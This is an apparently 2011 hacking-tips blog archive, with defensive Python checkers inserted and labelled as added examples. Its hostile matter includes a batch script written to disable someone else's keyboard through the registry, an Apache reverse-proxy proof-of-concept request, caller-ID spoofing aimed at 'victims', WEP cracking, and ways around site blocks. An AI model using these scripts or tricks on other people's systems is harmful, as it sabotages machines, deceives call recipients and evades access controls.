Monday 28 November 2011

Is your antivirus working properly? Learn how to check its functionality.


Is your antivirus program working properly? Ever wondered how to check the functionality of your antivirus? Described below is an easy way to check it. The process is called the EICAR test, and it works on any antivirus program. It was developed by the European Institute of Computer Antivirus Research. Antivirus programmers can also use this process to test the working of their antivirus program. To test your antivirus, follow the steps given below.

Open Notepad and copy and paste the following code:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*



Now save it as my file.com
If the antivirus installed on your computer is working properly, it must display a message saying that the file is a virus, and the file should be deleted immediately, which means your antivirus is working properly. If your antivirus program doesn't detect it as a virus, you must change your antivirus program.
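The same check as a script, added here as an example and not part of the original post: it writes the test string shown above to a temporary .com file and reports whether a resident (on-access) scanner blocked or removed it. The function names, file name and wait time are assumptions of this example; the trailing-whitespace and 128-byte rules come from the EICAR definition of the test file.

```python
import os
import tempfile
import time

# The 68-character test string from the post, assembled from pieces so that
# this script is not itself flagged while it sits on disk.
EICAR = "".join([r"X5O!P%@AP[4\PZX54(P^)7CC)7}$", "EICAR-STANDARD-",
                 "ANTIVIRUS-TEST-FILE!", "$H+H*"])

# Trailing bytes the EICAR definition tolerates: space, tab, LF, CR, Ctrl-Z.
ALLOWED_TRAILING = b" \t\n\r\x1a"


def is_eicar_test_file(data: bytes) -> bool:
    """True if data is the test string, optionally followed only by the
    allowed whitespace, with a total length of at most 128 bytes."""
    body = EICAR.encode("ascii")
    if len(data) > 128 or not data.startswith(body):
        return False
    return all(b in ALLOWED_TRAILING for b in data[len(body):])


def check_on_access_scanner(directory=None, wait_seconds=3.0):
    """Drop the test file and report what the resident scanner did with it.

    Returns "blocked" (write or read refused), "removed" (file deleted or its
    content replaced) or "not detected" (file still intact after the wait).
    """
    directory = directory or tempfile.gettempdir()
    path = os.path.join(directory, "eicar_check_%d.com" % os.getpid())
    try:
        try:
            with open(path, "wb") as fh:
                fh.write(EICAR.encode("ascii"))
        except OSError:
            # Could also be a permissions problem in the chosen directory.
            return "blocked"
        deadline = time.monotonic() + wait_seconds
        while True:
            try:
                with open(path, "rb") as fh:
                    if not is_eicar_test_file(fh.read()):
                        return "removed"
            except FileNotFoundError:
                return "removed"
            except OSError:
                return "blocked"
            if time.monotonic() >= deadline:
                return "not detected"
            time.sleep(0.25)
    finally:
        # Clean up if the scanner left the file behind.
        try:
            os.remove(path)
        except OSError:
            pass


if __name__ == "__main__":
    print("on-access scanner result:", check_on_access_scanner())
```

A "not detected" result only says that real-time protection did not react within the wait; an on-demand scan of the file may still flag it.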

Adding more options in right click Context Menu of My Computer






I will be using Visual Basic Script (VBS) to modify the right-click context menu of My Computer. Copy the following code into your favorite text editor (e.g. Notepad++) and save it as anything.vbs. The .vbs extension must be there after you have named your script to make your script work.


*********Code starts from here***********

; Add Control Panel to Right Click Menu of My Computer
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Control Panel\command]
@="rundll32.exe shell32.dll,Control_RunDLL"


; Add Add/Remove Programs to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Add/Remove Programs\command]
@="control appwiz.cpl"


; Add Device Manager to Right Click Menu of My Computer
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Device Manager\command]
@="mmc.exe %%SYSTEMDRIVE%%\\WINDOWS\\SYSTEM32\\devmgmt.msc"


; Add Registry Editor to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command]
@="Regedit.exe"


; Add Services to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Services]
@=hex(2):53,00,65,00,72,00,76,00,69,00,63,00,65,00,73,00,00,00
"SuppressionPolicy"=dword:4000003c
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Services\command]
@=hex(2):25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,00,5c,00,73,00,79,00,73, 00,74,00,65,00,6d,00,33,00,32,00,5c,00,6d,00,6d,00,63,00,2e,00,65,00,78,00, 65,00,20,00,2f,00,73,00,20,00,25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52, 00,6f,00,6f,00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00, 32,00,5c,00,73,00,65,00,72,00,76,00,69,00,63,00,65,00,73,00,2e,00,6d,00,73, 00,63,00,20,00,2f,00,73,00,00,00


; Add LogOff to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Logoff]\command]
@="shutdown -l -f -t 5"


; Add Reboot to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Reboot]\command]
@="shutdown -r -f -t 5"


; Add Shutdown to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Shutdown]\command]
@="shutdown -s -f -t 5"


; Add Microsoft Configurator to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Microsoft Configurator\command]
@="msconfig.exe"


; Add Sound And Audio Devices to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Sound And Audio Devices\command]
@="control mmsys.cpl"


; Add Internet Properties to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Internet Properties\command]
@="control inetcpl.cpl"


*********Code ends here**************

Sunday 27 November 2011

Apache HTTP Server Reverse Proxy/Rewrite URL Validation Issue By Qualys


Proof of Concepts


Target:
Fully patched Apache Web Server (Version 2.2.21) with CVE-2011-3368
patch applied, with a reverse proxy set up and incorrectly configured
RewriteRule/ProxyPassMatch rules.


Rewrite rules in httpd.conf:
RewriteRule ^(.*) http://10.40.2.159$1
ProxyPassMatch ^(.*) http://10.40.2.159$1



Example 1:
GET @localhost:: HTTP/1.0\r\n\r\nwhere is any port
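A configuration check for the rule shape shown above, added here as an example and not part of the Qualys advisory: it flags RewriteRule/ProxyPassMatch lines whose substitution glues a backreference straight onto the backend host, and models why that matters when a request target does not begin with "/". The function names, the heuristic, the simplified matching model and the sample config and request targets are assumptions of this example.

```python
import re

# "RewriteRule <pattern> <substitution> [flags]" / "ProxyPassMatch <pattern> <target>"
DIRECTIVE = re.compile(r"^\s*(RewriteRule|ProxyPassMatch)\s+(\S+)\s+(\S+)", re.I)
# scheme://authority immediately followed by a backreference, no "/" in between
GLUED = re.compile(r"^[a-z][a-z0-9+.-]*://[^/\s$]+\$(\d)", re.I)

# Constructed sample: the first two rules are the ones quoted in the post,
# the last two are corrected forms.
SAMPLE_CONF = """\
# constructed httpd.conf fragment
RewriteEngine On
RewriteRule ^(.*) http://10.40.2.159$1
ProxyPassMatch ^(.*) http://10.40.2.159$1
RewriteRule ^/(.*) http://10.40.2.159/$1 [P]
ProxyPassMatch ^(/.*) http://10.40.2.159$1
"""


def group_starts_with_slash(pattern, n):
    """Heuristic: capture group n opens with a literal '/', so whatever it
    captures must begin with '/' (alternations inside the group are not analysed)."""
    opens = [m.start() for m in re.finditer(r"(?<!\\)\((?!\?)", pattern)]
    if not 1 <= n <= len(opens):
        return False
    start = opens[n - 1] + 1
    return pattern[start:start + 1] == "/"


def audit_proxy_rules(conf_text):
    """Return (line number, directive, pattern, substitution) for risky rules."""
    findings = []
    for lineno, line in enumerate(conf_text.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if not m:
            continue  # comments and unrelated directives
        directive, pattern, subst = m.groups()
        glued = GLUED.match(subst)
        if glued and not group_starts_with_slash(pattern, int(glued.group(1))):
            findings.append((lineno, directive, pattern, subst))
    return findings


def proxied_host(pattern, subst, request_target):
    """Simplified model of the rewrite: apply the rule to a raw request target
    and return the host the resulting URL points at (None if no match)."""
    m = re.search(pattern, request_target)
    if m is None:
        return None
    url = re.sub(r"\$(\d)", lambda ref: m.group(int(ref.group(1))) or "", subst)
    authority = url.split("://", 1)[1].split("/", 1)[0]
    # Everything before "@" in an authority is userinfo, not the host.
    return authority.rpartition("@")[2].split(":", 1)[0]


if __name__ == "__main__":
    for finding in audit_proxy_rules(SAMPLE_CONF):
        print("line %d: %s %s %s" % finding)
    # Constructed request target that does not start with "/"
    print(proxied_host(r"^(.*)", "http://10.40.2.159$1", "@other.example/status"))
    print(proxied_host(r"^/(.*)", "http://10.40.2.159/$1", "@other.example/status"))
```

With the corrected forms the pattern only matches targets that start with "/", and the "/" after the host keeps the backend address as the authority of the proxied URL.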

Saturday 26 November 2011

Google Search With Effectively







Source: http://mashable.com/2011/11/24/google-search-infographic/


WEP Cracking Cheatsheet From Wicky.ws




I’m using an ALFA AWUS036H connected to an Acer Aspire One D255
running BackTrack 5. The first thing I’ve found with this set up is that
the rtl8187 kernel module seems to conflict with the iwlagn Intel
wireless driver, so I just remove the Intel one while I’m using the
ALFA.

# rmmod iwlagn

Then plug in the ALFA. You should see something like the following in /var/log/messages:


Nov 25

Thursday 24 November 2011

Enabling God Mode in Windows 7.




In this post I will show you how you can enable God Mode on your Windows 7 machine. It brings all the Windows settings under one hood without needing to browse options and folders in the Control Panel. The term “GOD MODE” is given by Microsoft Development Team.
Follow the steps described below:

1. Create a new folder.
2. Rename the folder to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} (you can change the name GodMode to any name you wish, but remember not to change the text after GodMode).
3. The icon of your folder will change. Double-click on it to open the GOD MODE window.



Caller ID Spoofing: Display any number when you call your friend.


In this post I will be showing you guys how to do Caller ID Spoofing. It is basically a trick in which you can display any mobile number of your choice on your victim's mobile when you call him. For performing this simple trick there is a very cool website called CrazyCall.



When you visit this website, it will ask you for the country you are currently in, the mobile number you want to display on your victim's mobile and the mobile number you want to call. After filling in all the fields, click on the Get Me The Code button. You will be given a phone number with the secret code. Call the number you are given and follow the instructions. This service can also be used as a Voice Changer.

Tuesday 22 November 2011

Think You're Anonymous? Google Analytics May Prove Different


How He Did It


You'd think that this would take some serious sleuthing
techniques right? Well, thinking of tracking bloggers using their GA
code seems some hoopy thinking – but the method isn't hard.


Basically, Baio plugged the anonymous domains into eWhois:




Using a sample of 50 anonymous blogs pulled from discussion
forums and Google news, only 14 were using Google Analytics,

9 Indian Education based sites hacked and defaced by ZHC Unknown and ZHC Dropper Gen.

The Cyber NewZ || Get All The News About The Cyber World || The Cyber News: 9 Indian Education based sites hacked and defaced by ZHC Unknown and ZHC Dropper Gen.

Thursday 17 November 2011

Tuesday 15 November 2011

Howto: How to downgrade 5.0.1 to 4.3.3 / 4.3.5 - iPhone 4, 3GS, iPod Touch 4G, 3G, iPad:


Step 1: Make sure that you have downloaded the version of iOS
which you are going to downgrade to (4.3.5, 4.3.3 or any iOS version); you can
download any iOS firmware from our library - Click Here.

Step 2: Navigate to :
Windows Users: Windows > System 32 > drivers > etc
Mac Users : etc

Open hosts file with the text editor then add the following code to the end of the file :

74.208.105.171

Monday 14 November 2011

Preventing User from using almost all features of Windows.



In this trick we are going to learn how we can put restrictions on almost everything that Windows offers us. Sometimes it also becomes necessary for system administrators to restrict users from using certain Windows applications.

The easiest way for imposing restrictions on user is described below-
1.Open Registry Editor
2.Scroll down to the following registry key-
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3.Under this, one can create number of keys which can impose interesting restrictions on the users. Below are the DWORD values one can create.

  • NoDeletePrinter-This can be used to put restrictions on already installed printers. Data value 1 means installed printer cannot be deleted whereas data value 2 means it can be deleted
  • NoAddPrinter-It is quite similar to the previous restriction. It restricts the user from adding a new printer.
  • NoRun-This DWORD value can be used to either disable the run box or to enable it. Data value 1 disable the run box whereas data value 0 enables it back. 
  • NoFind-This DWORD value is used to either hide or show the find option generally present in start menu. Data Value 1 hides it whereas data value 0 shows it.
  • NoDrives-This DWORD value is used to hide all your hard drives present in My Computer. The data value 1 hides all the drives whereas data value 0 shows them back.
  • NoNetHood-This DWORD value is used to hide Network Neighborhood icon from the desktop. Data Value 1 hides the icon whereas data value 0 shows the icon back on desktop.
  • NoInternetIcon-This DWORD value is used to hide Internet Explorer icon from the desktop. Data value 1 is used to hide the icon whereas data value 2 is used to bring back the icon on the desktop.
  • NoCommonGroup-This DWORD value is used to hide Common Group folder. Data value 1 is used to hide the folder whereas data value 0 shows the folder back.
  • NoRecentDocsHistory-In windows whenever a document or a file is being opened it is automatically added to Recent Document History. This value can be used to prevent this. If the data value is 1 recent document will not be added to the list whereas if the data value is 0 the recent document will be added to the list.
  • ClearRecentDocsonExit-This DWORD value is used to automatically clear the Recent Document History. Data value 1 enables it whereas data value  2 disables it.
  • NoFavrouiteMenu-This DWORD value is used to enable or disable Favorite Menu option. Data value 1 disables it whereas data value 0 enables it back.
  • NoNetworkConnection-This DWORD value is used to hide or show Network and Dial-up Connection option. Data value 1 hides the option whereas data value 0 shows the option back.
  • NoSMHelp-This DWORD value is used to hide or show Windows Help option. Data value 1 is used to hide the option whereas data value 0 is used to show the option back
  • NoSMMyDocs-This DWORD value is used to hide or show My Document folder. Data value 1 is used to hide the folder whereas data value 0 is used to show the folder back
  • NoSMMYPictures-This DWORD value is used to hide or show My Pictures folder. Data value 1 is used to hide the folder whereas data value 0 is used to show the folder back.
  • NoStartMenuMyMusic-This DWORD value is used to hide or show My Music folder. Data value 1 is used to hide the folder whereas data value 0 is used to show the folder back.
  • NoToolBarOnTaskbar-This DWORD value is used to hide or show the Toolbars created by the user. Data value 1 hide the toolbar whereas data value 0 is used to show the toolbar back.
  • NoTrayItemDisplay-This DWORD value is used to hide or show the application icons which are present near the system clock. Data value 1 is used to hide those icon whereas data value 0 is used to show the application back.
  • HideClock-This DWORD value is used to hide or display System Clock. Data value 1 is used to hide the system clock whereas data value 0 is used to show the system clock back
  • NoSetFolders-This DWORD value is used to hide or show Setting Folder option. Data value 1 is used to hide it whereas data  value 0 is used to display it back.
  • NoDesktop-This DWORD value is used to hide or show all the icons (including system folders etc.) on the desktop. Data value 1 is used to hide all the icons whereas data value 0 is used to display all the icons back.
  • NoClose-This DWORD value is used to hide or show Shutdown Button. Data value 1 is used to hide the shutdown button whereas data value 0 is used to bring back the shutdown button.
  • NoSaveSetting-This DWORD value is used to prevent the Desktop Settings from being changed. Data value 1 is used to enable it whereas data value 0 is used to disable it.
  • DisableRegistryTools-This DWORD value is used to enable or disable Windows Registry Editor. Data value 1 is used to disable registry editor whereas data value 0 is used to enable the registry editor back.
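To see which of these restrictions are already set on a machine, the key can be exported from Registry Editor and checked offline. The parser below is an added example, not part of the original post: it reads .reg export text and lists the restrictions from the list above that are switched on (data value 1). The function names and the sample export are constructed, and only entries for which the post gives 1 = on and 0 = off are included.

```python
import re

EXPLORER_KEY = (r"HKEY_CURRENT_USER\Software\Microsoft\Windows"
                r"\CurrentVersion\Policies\Explorer")

# Value names and effects as described in the list above.
RESTRICTIONS = {
    "NoRun": "Run box disabled",
    "NoFind": "Find option hidden",
    "NoDrives": "drives hidden in My Computer",
    "NoNetHood": "Network Neighborhood icon hidden",
    "NoRecentDocsHistory": "recent documents not recorded",
    "HideClock": "system clock hidden",
    "NoSetFolders": "Settings folder option hidden",
    "NoDesktop": "desktop icons hidden",
    "NoClose": "Shutdown button hidden",
}

SECTION = re.compile(r"^\[(-?)(.+)\]$")
VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')

# Constructed sample export, not taken from a real machine.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

; the NoRun value under this unrelated key must be ignored
[HKEY_CURRENT_USER\Control Panel\Desktop]
"Wallpaper"="C:\\Windows\\Web\\Wallpaper\\img0.jpg"
"NoRun"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000001
"NoFind"=dword:00000000
"NoDrives"=dword:00000001
"NoClose"=dword:00000001
"HideClock"=dword:00000001
"HideClock"=-
'''


def parse_reg_export(text):
    """Return {key path (lower case): {value name (lower case): data}}.
    Handles dword and string values plus the "name"=- and [-key] delete forms."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        section = SECTION.match(line)
        if section:
            deleted, path = section.groups()
            if deleted:
                keys.pop(path.lower(), None)
                current = None
            else:
                current = keys.setdefault(path.lower(), {})
            continue
        value = VALUE.match(line)
        if value is None or current is None:
            continue  # header line, comments, blank lines, default values
        name, data = value.groups()
        if data == "-":
            current.pop(name.lower(), None)
        elif data.lower().startswith("dword:"):
            current[name.lower()] = int(data[6:], 16)
        elif data.startswith('"') and data.endswith('"'):
            current[name.lower()] = data[1:-1].replace("\\\\", "\\")
    return keys


def active_restrictions(text):
    """Restrictions from RESTRICTIONS whose DWORD is 1 under the Explorer policy key."""
    values = parse_reg_export(text).get(EXPLORER_KEY.lower(), {})
    return {name: effect for name, effect in RESTRICTIONS.items()
            if values.get(name.lower()) == 1}


if __name__ == "__main__":
    for name, effect in sorted(active_restrictions(SAMPLE_EXPORT).items()):
        print("%-22s %s" % (name, effect))
```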

Sunday 13 November 2011

Denial of Service(DoS) Attack-Explained


Denial of Service attack, or simply DoS attack, is a kind of attack in which the attacker is able to consume so much memory of the target system that it cannot serve legitimate users, or it causes the target system to crash or reboot. Nowadays DoS attacks are considered very deadly due to their after-attack impact.

There are many types of DoS attacks, the most popular of which are described below:

  • Smurf attacks
  • SYN-flood attacks
  • Land attack
  • UDP-flood attack


Smurf Attacks
A Smurf attack is a kind of brute-force DoS attack in which a huge amount of ping requests are sent to the target computer from a spoofed IP address, which hooks up the resources of the target computer, resulting in a crash or reboot.

SYN-Flooder Attack
This is one of the easiest DoS attacks that can be executed on the target system. In this kind of attack the target system is flooded with full connection requests from a spoofed IP address. The target system tries to establish a full connection for every connection request via the Three-Way-Handshake, and as a result all system resources are utilized, resulting in a crash or reboot. This is because when the attacker requests a connection to the target, it sends a SYN packet from the spoofed source IP; to complete the connection, the target sends a SYN/ACK packet to the spoofed IP address and waits to receive an ACK packet, consuming some memory while it waits. When a huge amount of connection requests are sent to the target from the spoofed source, all the resources are consumed.


Land Attack
This kind of DoS attack is similar to the SYN-flooder attack; the only difference is that instead of sending the connection request from a spoofed source, it sends the connection request from the target computer's own IP address.


UDP-Flood Attacks
This DoS attack basically exploits the target system's echo service to create infinite loops between two or more UDP services.
Wikipedia explains the UDP-flood attack as:

UDP flood attack is a denial-of-service (DoS) attack using the User Datagram Protocol (UDP), a stateless computer networking protocol.
Using UDP for denial-of-service attacks is not as straightforward as with the Transmission Control Protocol (TCP). However, a UDP flood attack can be initiated by sending a large number of UDP packets to random ports on a remote host. As a result, the distant host will:
  • Check for the application listening at that port;
  • See that no application listens at that port;
  • Reply with an ICMP Destination Unreachable packet.
Thus, for a large number of UDP packets, the victimized system will be forced into sending many ICMP packets, eventually leading it to be unreachable by other clients. The IP address of outgoing packets may also be spoofed, ensuring that the excessive ICMP return packets do not reach the attacker, simultaneously making it harder to determine the source of the attack.
This attack can be managed by deploying firewalls at key points in a network to filter out unwanted network traffic. The potential victim never receives and never responds to the malicious UDP packets because the firewall stops them.
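The SYN-flood and Land descriptions above translate directly into detection logic. The following is an added example, not part of the original post: it walks a list of packet records, tracks which SYNs were never answered with the final ACK of the handshake, and reports listeners with many stale half-open connections as well as SYNs whose source address equals the destination. The record layout, the thresholds and the sample capture (documentation address ranges) are constructed.

```python
from collections import defaultdict


def find_half_open(packets, timeout=3.0, threshold=5):
    """packets: (ts, src, sport, dst, dport, flags) tuples sorted by ts, with
    flags "S" (SYN), "SA" (SYN/ACK) or "A" (ACK).

    Returns {"syn_flood": {(dst, dport): distinct sources left half-open},
             "land": [connection tuples with src == dst]}.
    """
    pending = {}   # client-side 4-tuple -> time the SYN was seen
    land = []
    last_ts = 0.0
    for ts, src, sport, dst, dport, flags in packets:
        last_ts = ts
        conn = (src, sport, dst, dport)
        if flags == "S":
            if src == dst:
                land.append(conn)      # Land: request claims to come from the target
            else:
                pending[conn] = ts
        elif flags == "A":
            pending.pop(conn, None)    # third step seen: handshake completed
        # "SA" packets travel server -> client and need no tracking here

    stale = defaultdict(set)
    for (src, sport, dst, dport), ts in pending.items():
        # A SYN that is still young may simply not have been answered yet.
        if last_ts - ts >= timeout:
            stale[(dst, dport)].add(src)
    flood = {target: len(srcs) for target, srcs in stale.items()
             if len(srcs) >= threshold}
    return {"syn_flood": flood, "land": land}


def sample_capture():
    """Constructed capture: one normal client, eight sources that never ACK,
    one Land-style packet and one fresh SYN at the end of the capture."""
    server = "192.0.2.10"
    pkts = [
        (0.00, "198.51.100.7", 40000, server, 80, "S"),
        (0.01, server, 80, "198.51.100.7", 40000, "SA"),
        (0.02, "198.51.100.7", 40000, server, 80, "A"),
    ]
    for i in range(8):
        src = "203.0.113.%d" % (i + 1)
        pkts.append((0.10 + i * 0.01, src, 1024 + i, server, 80, "S"))
        pkts.append((0.105 + i * 0.01, server, 80, src, 1024 + i, "SA"))
    pkts.append((0.50, server, 80, server, 80, "S"))
    pkts.append((5.00, "198.51.100.9", 40001, server, 80, "S"))
    return pkts


if __name__ == "__main__":
    result = find_half_open(sample_capture())
    for (dst, dport), count in result["syn_flood"].items():
        print("possible SYN flood on %s:%d, %d half-open sources" % (dst, dport, count))
    for conn in result["land"]:
        print("Land-style SYN:", conn)
```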



Traceroute-like HTTP scanner


If you want the script and the detail and example of this topic, please go to the Source.



During some recent pentests, I used the "Max-Forwards" trick to
identify some "hidden" reverse HTTP proxies. My customers were
surprised by the information found and asked me for a copy of the tool.
I then chose to take some time to polish and release it. Btw,
thanks to Julien Cayssol for the initial

Disable Keyboard Using Batch Script.





In this post I will be showing you how you can disable someone's keyboard using the Batch Script below. Just copy and paste the following code into Notepad and save it as anything.bat


@echo off
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"


echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg



By running the above mentioned script, all the keys on the keyboard will be disabled.


Enable the Keyboard again:
To bring the keyboard back to its normal state, go to
Start>Run and type REGEDIT.MSC. This will bring up Windows Registry Editor. In the left pane navigate to the following key:
HKEY_LOCAL_MACHINE\System\ControlSet001\Control\Keyboard Layout, and delete the "Scancode Map" value present in the right pane.
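When a machine's keys stop responding, the "Scancode Map" value can be exported and decoded to see exactly what was changed. The decoder below is an added example, not part of the original post: it reads the value from .reg text and lists disabled and remapped keys. The value layout is eight header bytes, a 32-bit entry count that includes the terminator, then 4-byte entries of new scancode followed by original scancode; the script above declares 7c (124) entries. Function names, the threshold, the short key-name table and the sample value are constructed.

```python
import re
import struct

# A few set-1 scancodes for readable output (not a complete table).
KEY_NAMES = {0x01: "Esc", 0x1C: "Enter", 0x1D: "Left Ctrl", 0x39: "Space",
             0x3A: "Caps Lock", 0x3B: "F1", 0xE01D: "Right Ctrl"}

# Constructed sample: Esc and F1 disabled, Caps Lock remapped to Left Ctrl.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout]
"Scancode Map"=hex:00,00,00,00,00,00,00,00,04,00,00,00,00,00,01,00,00,\
  00,3b,00,1d,00,3a,00,00,00,00,00
'''


def key_name(code):
    return KEY_NAMES.get(code, "0x%04X" % code)


def extract_scancode_map(reg_text):
    """Return the raw bytes of the "Scancode Map" value, or None if absent."""
    joined = re.sub(r"\\[ \t]*\r?\n[ \t]*", "", reg_text)  # join "\" continuations
    m = re.search(r'"Scancode Map"=hex:([0-9a-fA-F, ]+)', joined)
    if m is None:
        return None
    return bytes(int(b, 16) for b in m.group(1).replace(" ", "").split(",") if b)


def decode_scancode_map(blob):
    """Return [(original scancode, new scancode), ...] without the terminator."""
    if len(blob) < 16:
        raise ValueError("too short for header, count and terminator")
    _version, _flags, count = struct.unpack_from("<III", blob, 0)
    if count < 1 or len(blob) < 12 + 4 * count:
        raise ValueError("entry count does not fit the data")
    entries = []
    for i in range(count - 1):
        new, old = struct.unpack_from("<HH", blob, 12 + 4 * i)
        entries.append((old, new))
    if struct.unpack_from("<I", blob, 12 + 4 * (count - 1))[0] != 0:
        raise ValueError("missing null terminator entry")
    return entries


def triage(reg_text, disable_threshold=10):
    """Summarise the map; 'suspicious' means many keys are mapped to nothing."""
    blob = extract_scancode_map(reg_text)
    if blob is None:
        return None
    entries = decode_scancode_map(blob)
    disabled = [key_name(old) for old, new in entries if new == 0]
    remapped = [(key_name(old), key_name(new)) for old, new in entries if new != 0]
    return {"disabled": disabled, "remapped": remapped,
            "suspicious": len(disabled) >= disable_threshold}


if __name__ == "__main__":
    print(triage(SAMPLE_REG))
```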

Saturday 12 November 2011

How to Trace Mobile Numbers.


Due to the ever-increasing popularity of mobile phones, the number of illegal and criminal activities has also increased. In some cases tracing mobile numbers plays an important role in investigations. Sometimes it also becomes necessary to trace mobile numbers to find where prank and annoying phone calls are coming from. It is not possible to trace the mobile number back to its caller. It is possible to find the location of the caller and the operator's name.

If you want a simple interface which asks you to enter the mobile number you want to trace, you can use International Numbering Plans.

By visiting the above mentioned link you can only get the location of the caller and the operator's name.

Accessing the blocked websites.




Nowadays, almost all modern antivirus programs have an inbuilt feature to block websites, which restricts the user from opening those blocked websites. Mostly in schools, colleges and universities, social networking websites like Facebook and Twitter are blocked so that students concentrate only on their study material and nothing else. In this post I will show you how you can access websites which are blocked.

Using Proxy Servers
A proxy server acts as a buffer between you and the remote host with whom you are connected. When you use a proxy server, your connection with the remote host is not established directly. First the connection is established with the proxy server, then the proxy server connects you to the remote host.
In order to access the blocked websites you can use an Online Web Proxy. There are thousands of free online web proxies to surf the blocked websites and remain anonymous.
My personal favourite online web proxies are:
1. Bind2

You can go to the above mentioned sites. At the bottom of the page there will be a box asking you to enter the URL of the website which you want to surf. Enter the URL and hit the Start or GO button. The blocked website will appear on your screen.


Setting Screen Saver as Desktop background.




This is one of my favorite tricks, in which you can set almost any screen saver as your desktop background. This trick can help you for presentation purposes etc. So follow the simple steps below:
Open Command Prompt by going to Start|Run|cmd.exe.
1. Now type cd c:\windows\system32 (this will change the current directory to the System32 folder where all screen savers are stored)
2. Type dir /s *.scr (this will give you the list of all the screen savers present in the directory)
